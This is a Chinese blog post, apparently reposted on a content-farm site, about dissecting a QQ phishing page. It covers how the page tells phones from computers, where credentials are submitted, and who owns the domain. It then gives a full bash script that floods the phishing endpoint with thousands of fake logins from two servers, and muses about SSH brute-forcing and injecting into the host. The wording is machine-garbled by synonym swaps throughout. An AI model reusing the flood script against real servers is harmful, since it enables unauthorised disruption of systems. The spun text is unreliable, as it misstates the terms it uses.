对一次钓鱼事件的分析

本文是对一次垂纶事件的剖析,鄙人水平实在不高,请路过的高手勿喷。像收集垂纶这种违法事件时不时地显现在我们身边,下面是本人的亲自履历。

[原文来自:www.ii77.com]

昨天在刷空间时看到同窗发了这么一条新闻,留言? [原文来自:www.ii77.com]

打开看看,嗯,纰谬啊,我俩18年6月加的石友啊,这是什么情形?

带着满脑子问号,扫码进去,瞬间就小心了。

先瞎输一气,发现我的输入法纰谬劲啊,我用的讯飞输入法不长如许啊?

究竟进去了?!跳转到QQ空间手机网页版。难不成是垂纶?复制用浏览器打开,发现域名纰谬,果真是垂纶。

用电脑打开看看

百度?302重定向,emmm……摁F12看看,剖析一下响应日志,果真有发现

从这里不难发现我们如今接见的网址只不外是一个转发剧本,真正的页面是红线画的,302重定向就是他发出的。接见一下看看,同样也是被重定向到百度。

手机接见直接进入垂纶页面

领略了,网页写了判断,若是是手机就正常接见,若是是电脑就跳转到百度。用chrome模拟移动设备接见。

成功接见,然则我发现键盘使不了了,暗码框输不进去,禁用键盘,弹出了一个虚拟键盘让你输入账号暗码

能够一定这是为手机而量身定做的垂纶网站。从代码中能够看出,红线部门的“u”透露QQ号码,“p”透露暗码。黑线框起来的部门是生成虚拟键盘的代码,太长,就睁开了一段。

这段是跳转url,应该是用来提交信息的。

啊,一大串的字符串,看模样是BASE64加密的,BASE64在线解密https://www.bejson.com/enc/base64/

看模样这是层unicode,还要转换一下,转换之前需要把所有“%”号替代成“\”号。在线unicode转中文https://www.bejson.com/convert/unicode_chinese/

文字显露出来了

如法炮制,解密所有字符串

没什么可行使的器材。

随便输个账号暗码,发现先是接见了一个php页面然后跳转到H5QQ空间。这个dnf.php就应该是用来提交信息的。

查一下域名,竟然是企业办的。然则www打不开。反查下whois,究竟我惊了,这小我名下的域名有十万多个….站长之家http://tool.chinaz.com/

ping一下,再查询一下IP信息,确定没有CDN。

直接接见IP,好熟悉的一幕,这不是浮图吗?

接见默认8888端面试试,的确是浮图,然则没有平安进口和账号暗码什么的,就我这水平,搞他是弗成能的。22端口开放了,ssh爆破进展迷茫,888端口固然开放然则找不到phpmyadmin,php mysql注入判断还被阻挡……

倏忽想起他的提交页面,呵呵,搞不死他也得搞残他,必需得搞搞他!打开xshell,保持了我的云办事器,vim写了一个剧本,

代码如下

#!/bin/bashi=1  #界说变量until ((i>10000))  #让剧本一连执行10000次do  #起头轮回    function rand(){        min=$1        max=$(($2-$min+1))        num=$(($RANDOM+1000000000))        echo $(($num%$max+$min))                   }  #生成长度为十位的随机数        name=$(rand 1000000000 9999999999)  #界说QQ账号,1000000000-999999999的随机数        pwd=$(head -c 9 /dev/random | base64)  #界说暗码,12位的随机字符串        curl -v 'https://cdn.tldcnm.com/dnf.php?u='$name'&p='$pwd'' \  #提交post恳求,发送子虚账号暗码信息,好好填充一下他的数据库,并在执行时输出实时信息          -H 'authority: cdn.tldcnm.com' \          -H 'upgrade-insecure-requests: 1' \          -H 'user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.43 Mobile Safari/537.36' \  #这里我们模拟成移动终端设备,不然或者提交不成功          -H 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \          -H 'sec-fetch-site: same-origin' \          -H 'sec-fetch-mode: navigate' \          -H 'sec-fetch-user: ?1' \          -H 'sec-fetch-dest: document' \          -H 'referer: https://cdn.tldcnm.com/' \          -H 'accept-language: zh-CN,zh;q=0.9' \          -H 'cookie: PHPSESSID=cddh7cie2m1a8lmcqch2avtf37' \          --compressed        sync        echo 3 > /proc/sys/vm/drop_caches  #清理缓存,节约空间done  #轮回竣事

bash测试一下,看到输出信息,post提交成功而且一连提交10000次。

因为剧本提议的post恳求跟正常接见页面一般,不属于DDOS,浮图和防火墙不会阻挡,返回302则表明提交成功(提交成功后会被重定向,所以返回302)。为了提高效率我用两台办事器多线程一路跑,估量数据库里找到真实的账号暗码得费老劲了,全被无用的子虚数据覆没了。

问了一下同伙关于这张垂纶..图片的事,他透露并不知情,很有或者中病毒了。同时也敷陈了其他扫过这个码的人,通知他们实时地点窜暗码,包管本身的隐私和产业平安!

最后总结一下防钓经验:只如果让你输入账号暗码,就要考虑是不是垂纶网站,尽或者使用一键登录或许扫码上岸避免暗码泄露的风险。接见时看看网址域名,若是不是QQ官方域名并且没有快捷、一键登录选项那绝大多数都是垂纶的。本人已经将此信息提交到360举报..,阻止更多的人受骗受骗。进展每一个被垂纶的同伙都把垂纶网站举报,让360,腾讯等平安..实时提醒并阻挡正在接见垂纶页面的人,防止更多的人受骗受骗!

净化收集情况,维护互联网平安,从我们每一小我做起!

加油武汉,加油地球,病毒必败!

*本文作者:一个神秘的人,转载请注明来自FreeBuf.COM


出色介绍






标签:钓鱼 事件 分析

热门文章

  1. “五一”假日,歙县接待游客86.95万人!2024-05-16
  2. 隆盛科技:公司内部正推进人形机器人在生产场景的应用2024-05-16
  3. 南都电源:公司高能量密度的电芯产品可用于飞行汽车、无人机等2024-05-16
  4. 隆盛科技:公司部分产品在无人驾驶涉及的相关领域已开展供货业务2024-05-16
  5. 天海防务收年报问询函:要求公司说明对前期财务报表进行更正的原因2024-05-16
  6. 龙芯中科:3C6000在中测阶段,2K3000计划上半年交付流片2024-05-16
  7. ST交投收年报问询函:要求说明公司持续经营能力及持续盈利能力是否存在重大不确定性2024-05-16
  8. 理想汽车:今年底将建成超2000座理想超充站2024-05-16
  9. *ST中利:公司5G网络类网线、光电混合缆等产品适用于高速连接及数据传输2024-05-16
  10. 长虹美菱:将举办股东感恩回馈节,价格优惠40%-60%2024-05-16
  11. 劲仔食品:目前公司原料小鱼主要来自东南亚,肯尼亚原料基地目前在逐步提升产能中2024-05-16
  12. 港股收评:恒指涨1.59%,恒生科技指数涨0.76%,内房股、内银股走强2024-05-16
  13. 刘强于海田到国网山东省电力公司走访座谈2024-05-16
  14. 券商股临近尾盘再度走弱,首创证券、浙商证券跌超3%2024-05-16
  15. 沪指午后翻绿2024-05-16
  16. 亚太主要股指收盘全线上涨2024-05-16
  17. 涉嫌利益输送?21家公司授予价大幅低于每股净资产,投资者质疑“给高管送钱”2024-05-16
  18. 理想汽车开启新一轮人员调整,优化超过18%2024-05-16
  19. A股收评:午后券商板块跳水,沪指收涨0.08%,房地产服务、房地产开发概念全天领涨2024-05-16
  20. 沪深两市今日成交额合计8478亿元,万丰奥威成交额再次居首2024-05-16
自媒体 微信号:ii77 扫描二维码关注公众号
爱八卦,爱爆料。

小编推荐

  1. 1 施耐德电气陈蔚蔚:存量经济时代 服务为王

    申耀的科技视察 读懂科技,赢取将来! 当我们意识到改变已经在一夕之间发生时,实际上它已经铺垫了良久。 施耐德电气副总裁、办事买卖中国区负责人 陈蔚蔚 数字化海潮拉开办事

  2. 2 这篇文章,把新型存储说清楚了

    存储器 是现代信息系统的要害组件之一,已经形成了一个首要由DRAM与NAND Flash构成的跨越1600亿美元的市场。 同时,新型存储起头慢慢迈向财富化,将有或者重塑将来存储市场款式。 我

  3. 3 华为推出OptiXstar千兆智能光猫,携手运营商开启Wi-Fi 6时代

    手机进入5G时代,能够说上彀速度有了大幅提拔,在体验手机高速上彀的同时,或者不少人都想问,什么时候我们家的宽带也能这么快呢?事实上彀络的手艺提高都从未住手,宽带提速

  4. 4 中国移动371亿5G基站大单落地,4家中标!

    3月31日,万众瞩目的《中国移动2020年5G二期无线网主设备集中采购》究竟出炉。本次集采局限涉及全国28个省(市、区),总采购规模跨越23万个5G基站。 究竟如下: 总结如下: 1)份额

  5. 5 Facebook、苹果AR争夺战:Micro LED重要供应商被抢走

    hi188|编纂 众所周知光学和显露部门是当下AR眼镜的两大焦点手艺,也是当下较难冲破的要害性手艺。以显露模组来看,今朝AR眼镜中主流的包罗LCoS、DLP、Micro OLED,以及Micro LED、视网膜

  6. 6 华为即将发布2019年业绩,2019年Q4业绩或出现下滑

    据悉华为即将在今世界午发布2019年的业绩,2019年前三季度它取得了跨越两成的增进,然则跟着美国身分的影响加大,2019年四时度它的业绩或将显现下滑。 华为发布的业绩显露,2019年

  7. 7 揭秘疫情下的苹果保密文化:在家研发新品需获副总裁批准

    苹果Apple Park总部俯拍 苹果公司的保密文化由来已久。从乔布斯时代起头,苹果就对正在斥地的产物严厉保密,然则这些保密办法都布置在公司。 现在,苹果因为疫情被迫要求员工在家

  8. 8 Echodyne新款自动驾驶汽车雷达 被赋予感知传感能力

    点击 上方“IEEE电气电子工程师”即可订阅公家号。网罗全球科技前沿动态,为科研创业打开脑洞。 Photo: Mark Harris The EchoDrive cognitive radar system (front of roof rack) is shown here installed on Echo

  9. 9 戴口罩还能刷脸?没问题!

    跟着国内疫景遇势好转,大人复工、孩子们复课慢慢提上日程,确保各行各业平安有序复工复产 、校园复学复课成为当下的优等大事。 同时,疫情防控不克放松,每一道关卡都必需谨

  10. 10 增资 50 亿元!TCL科技支持TCL华星聚焦半导体显示

    凭据3/31通知,为聚焦半导体显露主业成长,支撑 TCL 华星光电手艺有限公司拓展买卖规模、提拔市场地位、增加行业内竞争能力,打造全球化的半导体显露行业财富链生态系统,TCL 科技

本文内容来自网友供稿,如有信息侵犯了您的权益,请联系反馈核实

Copyright 2024.爱妻自媒体,让大家了解更多图文资讯!